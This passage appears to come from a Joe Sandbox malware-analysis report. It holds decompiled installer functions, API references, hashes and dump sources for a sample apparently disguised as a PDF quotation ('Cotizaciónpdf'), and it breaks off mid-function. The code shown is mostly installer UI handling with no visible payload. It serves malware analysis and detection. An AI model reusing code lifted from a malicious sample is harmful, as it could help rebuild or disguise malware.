Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402648
0x0040265c
0x00402667
0x00402668
0x004027a3
0x0040264a
0x0040264a
0x0040264c
0x0040264e
0x0040264e
0x00402880
0x0040288c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A

Uniqueness

Uniqueness Score: -1.00%

Function 0019E83A, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249354144.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
Instruction ID: f1dcad52f0ca3e643c0e706cafc078cc62ce7d9979b7c44c569e92b4a0e6df14
Opcode Fuzzy Hash: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
Instruction Fuzzy Hash: A2617B31E10218ABCF20DFA4C884BAEB7F5BF58710F248459E906EB390EB749D418B64

Uniqueness

Uniqueness Score: -1.00%

Function 0019EA4E, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249354144.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: d0fef7825081e605b98fdc9e8a8870f96b10cd714edb0726181ea551a385da52
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: 1611A031A00118AFCF20DBAAC8888AEF7FEFB54794B5440A5E805D3220E7709E80C660

Uniqueness

Uniqueness Score: -1.00%

Function 0019EB3E, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249354144.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: db5953abb8c4cdf7a3afbbade40b0990a6832afd82dacfc7932bcff5eaa3ac4b
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: E4E01A357A46499FCB58CBA8C881D25B3F8EB19720B154294FC27C7BA1EB35EE00DA50

Uniqueness

Uniqueness Score: -1.00%

Function 0019EB7C, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249354144.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: 87fa94d605e1ce7bba35b66b012f4a7aeb961dc0766a490f8ed32cbd144c4e62
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: D0E08C323215208FCB20DA19D880D62F3E9FBC87B2B1A886AE94BD7711D330FC00C660

Uniqueness

Uniqueness Score: -1.00%

Function 0019EAFF, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249354144.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19e000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00403964, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, 0x4236a0);
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421498 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x0040396d
0x00403976
0x00403ab7
0x00403abb
0x00403abf
0x00403ac1
0x00403ac6
0x00403ad1
0x00403adc
0x00403ae1
0x00403ae3
0x00403ae5
0x00403ae8
0x00403aed
0x00403afb
0x00403b08
0x00403b0f
0x00403b0f
0x00403b10
0x00403b10
0x00403b15
0x00403b1b
0x00403b22
0x00403b28
0x00403b2a
0x00403b6a
0x00403b6f
0x00403b74
0x00403b74
0x00403b79
0x00403b82
0x00403b84
0x00403b89
0x00403b8f
0x00403b93
0x00403b93
0x00403b98
0x00403b9e
0x00000000
0x00000000
0x00403ba9
0x00403baf
0x00000000
0x00000000
0x00403bb8
0x00403bc0
0x00403bc5
0x00403bc8
0x00403bce
0x00403bd3
0x00403bd6
0x00403bdc
0x00403be1
0x00403be4
0x00403bea
0x00403bf2
0x00403bf8
0x00403bfe
0x00403c02
0x00403c09
0x00403c09
0x00403c09
0x00403c13
0x00403c25
0x00403c31
0x00403c36
0x00403c40
0x00403c46
0x00403c48
0x00403c4d
0x00403c4a
0x00403c4a
0x00403c4a
0x00403c5d
0x00403c75
0x00403c77
0x00403c7d
0x00403c92
0x00403c7f
0x00403c88
0x00403c8a
0x00403c8a
0x00403c98
0x00403ca8
0x00403cb9
0x00403cc0
0x00403cc6
0x00403cca
0x00403ccf
0x00403cd1
0x00000000
0x00403cd7
0x00403cd7
0x00403cd9
0x00000000
0x00000000
0x00403cdf
0x00403ce3
0x00403d08
0x00403d0e
0x00403d14
0x00403d16
0x00000000
0x00000000
0x00403d3c
0x00403d42
0x00403d44
0x00403d49
0x00000000
0x00000000
0x00403d4f
0x00403d52
0x00403d55
0x00403d6c
0x00403d78
0x00403d91
0x00403d97
0x00403d9b
0x00403da0
0x00403da6
0x00000000
0x00000000
0x00403db0
0x00403dbb
0x00000000
0x00403dbb
0x00403ce5
0x00403ceb
0x00000000
0x00000000
0x00403cf1
0x00403cf7
0x00000000
0x00000000
0x00000000
0x00403cfd
0x00403cd1
0x00403dc8
0x00403dd4
0x00403ddb
0x00000000
0x00403b2c
0x00403b2c
0x00403b2f
0x00403b62
0x00403b62
0x00403b64
0x00000000
0x00000000
0x00000000
0x00403b64
0x00403b31
0x00403b35
0x00403b3a
0x00403b3c
0x00000000
0x00000000
0x00403b4c
0x00403b54
0x00000000
0x00403b5a
0x00403988
0x00403988
0x0040398c
0x00403991
0x004039a0
0x004039a0
0x004039a9
0x004039b2
0x004039bd
0x004039bd
0x004039c9
0x004039e5
0x004039e8
0x004039fb
0x00403a01
0x00403aa4
0x00000000
0x00403aad
0x00403a07
0x00403a14
0x00403a16
0x00403a18
0x00403a37
0x00403a37
0x00403a3a
0x00403a3f
0x00403a42
0x00403a52
0x00403a53
0x00403a55
0x00403a8b
0x00403a9e
0x00000000
0x00403a9e
0x00403a57
0x00403a5d
0x00403a76
0x00403a7b
0x00403a7d
0x00000000
0x00000000
0x00403a7f
0x00403a6b
0x00403a6b
0x00403a6d
0x00403a6d
0x00000000
0x00403a6d
0x00403a60
0x00403a65
0x00000000
0x00403a65
0x00403a44
0x00403a4a
0x00000000
0x00000000
0x00403a4c
0x00000000
0x00403a4c
0x00403a3c
0x00000000
0x00403a3c
0x00403a22
0x00403a29
0x00403a2f
0x00403a31
0x00000000
0x00000000
0x00000000
0x00403a31
0x004039ed
0x00000000
0x004039cb
0x004039d1
0x004039db
0x00403de1
0x00403de7
0x00403df4
0x00403dfa
0x00403dfa
0x00403e04
0x00000000
0x00403e04
0x004039c9

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
ShowWindow.USER32(?), ref: 004039BD
DestroyWindow.USER32 ref: 004039D1
SetWindowLongA.USER32 ref: 004039ED
GetDlgItem.USER32 ref: 00403A0E
SendMessageA.USER32 ref: 00403A22
IsWindowEnabled.USER32(00000000), ref: 00403A29
GetDlgItem.USER32 ref: 00403AD7
GetDlgItem.USER32 ref: 00403AE1
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
SendMessageA.USER32 ref: 00403B4C
GetDlgItem.USER32 ref: 00403BF2
ShowWindow.USER32(00000000,?), ref: 00403C13
EnableWindow.USER32(?,?), ref: 00403C25
EnableWindow.USER32(?,?), ref: 00403C40
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
EnableMenuItem.USER32 ref: 00403C5D
SendMessageA.USER32 ref: 00403C75
SendMessageA.USER32 ref: 00403C88
lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
SetWindowTextA.USER32(?,00420498), ref: 00403CC0
ShowWindow.USER32(?,0000000A), ref: 00403DF4

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}

0x00403f8f
0x004040b5
0x00404111
0x00404115
0x004041ec
0x004041ee
0x004041ee
0x004041f4
0x004041f4
0x004041f7
0x00000000
0x004041fe
0x00404123
0x00404125
0x0040412f
0x0040413a
0x0040413d
0x00404140
0x0040414b
0x0040414e
0x00404155
0x00404163
0x0040417b
0x00404183
0x0040418e
0x0040419e
0x004041a0
0x004041a0
0x00404155
0x004041aa
0x00000000
0x004041b5
0x004041b9
0x004041ca
0x004041ca
0x004041d0
0x004041de
0x004041de
0x00000000
0x004041e2
0x004041aa
0x004040c0
0x00000000
0x004040d4
0x004040d4
0x004040da
0x004040da
0x004040e0
0x00000000
0x00000000
0x00404105
0x00404107
0x0040410c
0x00000000
0x0040410c
0x004040c0
0x00403f95
0x00403f98
0x00403f9d
0x00403fae
0x00403fae
0x00403fb5
0x00403fb8
0x00403fba
0x00403fbf
0x00403fc8
0x00403fce
0x00403fda
0x00403fdd
0x00403fe6
0x00403feb
0x00403fee
0x00403ff3
0x0040400a
0x00404011
0x00404024
0x00404027
0x0040403c
0x00404043
0x00404048
0x0040404d
0x0040404d
0x0040405c
0x0040406b
0x0040406d
0x00404083
0x00404092
0x00404094
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
GetDlgItem.USER32 ref: 0040401E
SendMessageA.USER32 ref: 0040403C
GetSysColor.USER32(?), ref: 0040404D
SendMessageA.USER32 ref: 0040405C
SendMessageA.USER32 ref: 0040406B
lstrlenA.KERNEL32(?), ref: 00404075
SendMessageA.USER32 ref: 00404083
SendMessageA.USER32 ref: 00404092
GetDlgItem.USER32 ref: 004040F5
SendMessageA.USER32 ref: 004040F8
GetDlgItem.USER32 ref: 00404123
SendMessageA.USER32 ref: 00404163
LoadCursorA.USER32 ref: 00404172
SetCursor.USER32(00000000), ref: 0040417B
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
LoadCursorA.USER32 ref: 0040419B
SetCursor.USER32(00000000), ref: 0040419E
SendMessageA.USER32 ref: 004041CA
SendMessageA.USER32 ref: 004041DE

Strings

open, xrefs: 00404186
N, xrefs: 00404111
@.B, xrefs: 00404183

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open
API String ID: 3615053054-3815657624
Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
